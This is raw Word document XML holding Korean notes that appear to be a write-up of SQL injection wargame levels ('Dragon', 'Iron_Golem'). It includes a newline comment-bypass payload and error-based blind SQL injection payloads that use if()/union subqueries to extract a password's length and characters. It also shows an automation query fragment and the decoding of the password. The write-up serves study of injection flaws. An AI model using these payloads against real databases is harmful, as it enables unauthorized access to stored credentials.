        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">50864 </w:t>
      </w:r>
      <w:r w:rsidRPr="008B4F8A">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>50773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B4F8A">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>44403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916C0B" w:rsidRDefault="008B4F8A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이걸 한글로 변환해보니 우왕굳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A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답은 우왕굳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRDefault="008B4F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B4F8A" w:rsidRPr="00916C0B" w:rsidRDefault="0028028D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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/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Dragon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시작부터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Hello Guest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라고 뜸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보아하니 id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’guest’#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라고 뒷줄 주석문으로 처리하는 것이 고정되어있음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#는 한줄주석으로 개행을 이용하여 우회 가능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그래서 다음과 같이 SQL 구문 삽입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pw=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’ %0a and pw=’1’ or id=’admin’ --+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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Iron_Golem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sleep 함수와 benchmark 함수를 막아놈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sleep 함수는 쿼리 실행을 의도적으로 지연시키는 경우 사용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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>benchmark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는 일정 시간동안 특정 구문을 반복적으로 실행하여 실행 시간을 체크할 때 사용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이것 또한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blind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SQL Injection 문제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여기서는 특이하게 mysql_error()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함수를 사용,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즉 에러가 발생하였을 경우 에러 구분을 띄워줌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즉,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error based blind sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A77" w:rsidRDefault="00865A77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A77" w:rsidRDefault="00D850B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여기서는 특정한 결과값이 출력되지 않기 때문에</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850B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if문을 활용해서 그 안에 조건문이 거짓 값이 될 경우 에러를 발생시키는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sql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문을 넣어서</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850B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결과값을 표출해야함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850B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그래서 다음과 같이 처음에는 패스워드의 길이를 알아냄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850BF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>pw='1' or if(length(pw)&lt;69,1,(select 1 union select 2)) -- '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850B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패스워드의 길이는 68인것을 알아냄.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또 길다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00D850BF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'1' or if(ord(substring(pw,1,1))&lt;50000,1,(select 1 union select 2)) -- '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D850BF" w:rsidRDefault="00BF0ECA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한글인거 같다.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10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진수 값이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48000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대로 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF0ECA" w:rsidRDefault="00BF0ECA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한글 하나는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4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바이트,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총 한글로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>글자이다.</w:t>
      </w:r>
      <w:r w:rsidR="003E6BE8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ㅣ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF0ECA" w:rsidRDefault="00BF0ECA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자동화 코드 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRDefault="00560D97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRPr="00560D97" w:rsidRDefault="00560D97" w:rsidP="00560D9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0D97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1' or if(ascii(substring(hex(pw),"</w:t>
      </w:r>
      <w:r w:rsidRPr="00560D9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560D97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560D9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pw_index) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00560D97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",1))&lt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00560D9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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00560D97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560D9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ascii_char) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00560D97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="굴림" w:hAnsi="Consolas" w:cs="굴림"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",1,(select 1 union select 2)) --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRDefault="00560D97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRDefault="00560D97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lastRenderedPageBreak/>
        <w:t xml:space="preserve">근데 결과값 가져오는 과정중에 특정 부분은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1111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내자리로 일정 규칙대로 적용되고 있는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRDefault="00560D97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한글 규칙중에 0이나 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>은 특정 표시, 즉 자동화 코드 상에서 먼저 비교해보고 넣기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560D97" w:rsidRDefault="00560D97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="00563B6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C9F9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CF55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BFCD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D68D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1132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CF8D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D671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D671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D671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D671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D671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D671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D671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D672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1132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1132</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="0092137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답은 다음과 같음.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하나씩 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>진수로 변환</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="0092137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C9F9 -&gt; 51705 -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00921375">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>짹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, CF55 -&gt; 53077-&gt; 콕, BFCD -&gt; 49101 -&gt; 뿍,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D68D -&gt; 54925 -&gt; 획</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="00921375">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00921375">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1132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-&gt; 4402 -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00921375">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ᄲ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="00921375">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="0092137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이런식으로 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921375" w:rsidRDefault="00563B6F" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563B6F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>짹콕뿍획ᄲ쾍홱홱홱홱홱홱홱홲ᄲᄲ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504EEE" w:rsidRDefault="00504EEE" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00504EEE" w:rsidRDefault="00504EEE" w:rsidP="00563B6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근데 아니라고 나옴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504EEE" w:rsidRDefault="00504EEE" w:rsidP="00563B6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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hex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값으로 변환 안하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>진수로 조회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504EEE" w:rsidRDefault="00504EEE" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00504EEE" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>47336 48708 44732 50556</w:t>
      </w:r>
      <w:r w:rsidR="00D90486">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 33</w:t>
      </w:r>
      <w:r w:rsidRPr="00504EEE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 48764 50528 50528 50528 50528 50528 50528 50528 50529</w:t>
      </w:r>
      <w:r w:rsidR="00D90486">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 33 33 33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00D90486" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00504EEE" w:rsidRDefault="00504EEE" w:rsidP="00563B6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루비꺼야</w:t>
      </w:r>
      <w:r w:rsidR="00D90486">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!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빼애애애애애애애액</w:t>
      </w:r>
      <w:r w:rsidR="00D90486">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!!</w:t>
      </w:r>
      <w:r w:rsidR="00D90486">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0699F" w:rsidRDefault="00F0699F" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0699F" w:rsidRDefault="00F0699F" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0699F" w:rsidRDefault="00F0699F" w:rsidP="00563B6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/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2019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lron_golem 변화</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0699F" w:rsidRDefault="00F0699F" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0699F" w:rsidRPr="00F0699F" w:rsidRDefault="00F0699F" w:rsidP="00563B6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia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코드 참조, 32개의 문자,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패스워드 한글자는 아스키코드 기준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&lt;127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이하.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00F0699F" w:rsidRPr="00F0699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907" w:rsidRDefault="007B1907" w:rsidP="003D59A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007B1907" w:rsidRDefault="007B1907" w:rsidP="003D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907" w:rsidRDefault="007B1907" w:rsidP="003D59A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007B1907" w:rsidRDefault="007B1907" w:rsidP="003D59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2F"/>
    <w:rsid w:val="000675FD"/>
    <w:rsid w:val="000B44FF"/>
    <w:rsid w:val="000D3B2F"/>
    <w:rsid w:val="000E1F27"/>
    <w:rsid w:val="000E285C"/>
    <w:rsid w:val="000E7594"/>
    <w:rsid w:val="00181E56"/>
    <w:rsid w:val="001C2044"/>
    <w:rsid w:val="001C23E6"/>
    <w:rsid w:val="001F24F7"/>
    <w:rsid w:val="001F5FEC"/>
    <w:rsid w:val="00220988"/>
    <w:rsid w:val="00225586"/>
    <w:rsid w:val="0028028D"/>
    <w:rsid w:val="002C6554"/>
    <w:rsid w:val="00361835"/>
    <w:rsid w:val="003C1E5F"/>
    <w:rsid w:val="003D59A8"/>
    <w:rsid w:val="003E6BE8"/>
    <w:rsid w:val="00412838"/>
    <w:rsid w:val="00435C36"/>
    <w:rsid w:val="00445FCF"/>
    <w:rsid w:val="00452084"/>
    <w:rsid w:val="00457369"/>
    <w:rsid w:val="0047163B"/>
    <w:rsid w:val="00504EEE"/>
    <w:rsid w:val="00511C37"/>
    <w:rsid w:val="00560D97"/>
    <w:rsid w:val="00563B6F"/>
    <w:rsid w:val="00574962"/>
    <w:rsid w:val="005A199D"/>
    <w:rsid w:val="00646CCA"/>
    <w:rsid w:val="00667182"/>
    <w:rsid w:val="0067325A"/>
    <w:rsid w:val="006C0054"/>
    <w:rsid w:val="006E3D2D"/>
    <w:rsid w:val="007522EC"/>
    <w:rsid w:val="007A7D6A"/>
    <w:rsid w:val="007B1907"/>
    <w:rsid w:val="007E02B5"/>
    <w:rsid w:val="00865A77"/>
    <w:rsid w:val="008B4F8A"/>
    <w:rsid w:val="00907104"/>
    <w:rsid w:val="00916C0B"/>
    <w:rsid w:val="00921375"/>
    <w:rsid w:val="00963958"/>
    <w:rsid w:val="009B7DAF"/>
    <w:rsid w:val="009D127F"/>
    <w:rsid w:val="009E3991"/>
    <w:rsid w:val="00A00705"/>
    <w:rsid w:val="00A52AE9"/>
    <w:rsid w:val="00B72B1A"/>
    <w:rsid w:val="00BF0ECA"/>
    <w:rsid w:val="00C91613"/>
    <w:rsid w:val="00CE35BA"/>
    <w:rsid w:val="00CE4D94"/>
    <w:rsid w:val="00D570FE"/>
    <w:rsid w:val="00D850BF"/>
    <w:rsid w:val="00D90486"/>
    <w:rsid w:val="00DA49B5"/>
    <w:rsid w:val="00DC2EFC"/>
    <w:rsid w:val="00E87CF2"/>
    <w:rsid w:val="00E91C45"/>
    <w:rsid w:val="00E96A47"/>
    <w:rsid w:val="00EF09A5"/>
    <w:rsid w:val="00F0699F"/>
    <w:rsid w:val="00F93C9D"/>
    <w:rsid w:val="00FA1B2F"/>
    <w:rsid w:val="00FB0ACE"/>
    <w:rsid w:val="00FB27A5"/>
    <w:rsid w:val="00FF0D57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9063DE-A19D-4514-8CCA-B4AF4FBC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2838"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C1E5F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D59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D59A8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D59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D5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ercederberg.net/tools/text_converte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37E0-F9A7-4FC4-946B-A5992D1D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0</TotalTime>
  <Pages>13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unKwon</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>김 윤권</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-19T12:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-27T14:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>